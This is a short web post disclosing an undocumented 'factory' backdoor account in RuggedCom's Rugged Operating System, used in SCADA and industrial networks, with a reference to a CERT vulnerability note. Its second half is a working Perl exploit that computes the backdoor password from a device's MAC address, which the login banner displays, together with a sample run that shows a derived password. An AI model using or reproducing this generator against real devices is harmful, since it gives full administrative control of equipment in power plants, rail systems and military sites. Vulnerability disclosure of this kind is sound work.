Story

RuggedCom - Backdoor Accounts in my SCADA network?

RuggedCom is one of a handful of networking vendors who capitalize onthe market for "Industrial Strength" and "Hardened" networking equipment.

You'll find their gear installed in traffic control systems, railroad communications systems, power plants, electrical substations, and even US military sites. Beyond simple L2 and L3 networking these devices are also used for serial-to-ip converstion in SCADA systems and they even support modbus and dnp3.

RuggedCompublished a handy guide to some of their larger customers at www.ruggedcom.com/about/customers/.

My favorite quote is from a contractor who installed RuggedCom equipment at a US Air Force base: "Reliability was not an option." How unfortunately apropos.

An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address.

Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified.

An attacker with knowledge of an ROS device's MAC address may be able to gain complete administrative control of the device. The MAC address is displayed in the pre-authentication banner.

We are currently unaware of a practical solution to this problem,published CERT US (http://www.kb.cert.org/vuls/id/889195 )
 

Exploit:

#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~ s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";

Example usage:

Given a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some
perl and learn that the password for "factory" is 60644375.

[jc () pig aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00
60644375
[jc () pig aids ros]$

 

 

Comments